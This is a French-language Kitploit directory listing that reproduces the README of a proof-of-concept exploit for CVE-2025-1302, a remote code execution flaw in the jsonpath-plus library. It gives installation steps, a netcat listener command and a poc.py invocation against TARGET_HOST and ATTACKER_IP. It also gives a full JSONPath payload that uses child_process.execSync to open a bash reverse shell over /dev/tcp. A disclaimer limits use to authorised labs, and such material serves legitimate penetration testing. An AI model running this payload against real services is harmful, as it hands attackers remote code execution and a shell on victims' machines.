Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-1302_jsonpath-plus_RCE — Exploit PoC et démo de serveur vulnérable pour CVE-2025-1302 dans jsonpath-plus. | Kitploit
Outils/GitHubGitHub/abrewer251/cve-2025-1302_jsonpath-plus_rce
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleRed TeamingDéveloppement de Charges Utiles
GitHubabrewer251/cve-2025-1302_jsonpath-plus_rce

CVE-2025-1302_jsonpath-plus_RCE

Exploit PoC et démo de serveur vulnérable pour CVE-2025-1302 dans jsonpath-plus.

Voir le dépôt
11il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-1302 PoC RCE JSONPath-Plus

Nom du script PoC : poc.py

Un script d'exploitation de preuve de concept pour CVE-2025-1302, qui cible une vulnérabilité RCE dans la bibliothèque jsonpath-plus. Exécuté contre un point de terminaison de service vulnérable, le script tente de déclencher une exécution de code à distance via une charge utile JSONPath et d'établir un reverse shell vers l'attaquant.


Fonctionnalités

  • Méthodes HTTP flexibles : prend en charge POST, GET ou AUTO (POST avec repli GET) via les options --method ou --no-fallback.
  • Charges utiles personnalisées : charge un ou plusieurs modèles de charge utile RCE JSONPath à partir d'un fichier, avec les modèles {ip} et {port}.
  • Charge utile par défaut intégrée : si aucun fichier de charge utile n'est fourni, utilise un modèle de reverse shell bash complet.
  • Débogage verbeux : affiche les corps complets des requêtes/réponses pour les tentatives POST et GET lorsqu'elles échouent.
  • Indicateurs de progression : affiche les boucles de délai et de charge utile avec les barres de progression tqdm.
  • Journalisation : sauvegarde éventuellement tous les résultats dans un fichier JSON avec --output.
  • Installation

    1. Clonez ce dépôt :

      root@kitploit:~
      git clone https://github.com/yourorg/jsonpath-rce-poc.git
      cd jsonpath-rce-poc
      
    2. Installez les dépendances (nécessite Python 3.6+) :

      root@kitploit:~
      pip install -r requirements.txt
      

    Utilisation

    1. Démarrez un écouteur sur votre machine d'attaque (remplacez le port si nécessaire) :

      root@kitploit:~
      nc -lvnp 9999
      
    2. Exécutez le PoC :

      root@kitploit:~
      python3 poc.py \
        --url http://TARGET_HOST:PORT/query \
        --ip ATTACKER_IP --port 9999 \
        [--payload-file payloads.txt] \
        [--delay 5] \
        [--method AUTO|POST|GET] \
        [--no-fallback] \
        [--output results.json]
      
    • --payload-file : fichier contenant une charge utile JSONPath par ligne. Utilisez les espaces réservés {ip} et {port}.
    • --delay : secondes à attendre avant d'envoyer les charges utiles (affiche le compte à rebours).
    • --method : force POST, GET ou AUTO (par défaut).
    • --no-fallback : raccourci pour ignorer toute tentative GET (équivalent à --method POST).
    • --output : chemin pour sauvegarder le journal JSON des tentatives.

    Exemple de fichier de charge utile

    root@kitploit:~
    $[?(@.constructor.constructor("require(\"child_process\").execSync(\"bash -i >& /dev/tcp/{ip}/{port} 0>&1\")")())]
    

    Contribution

    1. Forkez le dépôt et créez une branche de fonctionnalité.
    2. Soumettez une pull request avec vos modifications.

    Avertissement

    Utilisez ce script uniquement dans des environnements de laboratoire contrôlés contre des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de test. L'abus peut être illégal et contraire à l'éthique.

    Télécharger l’outil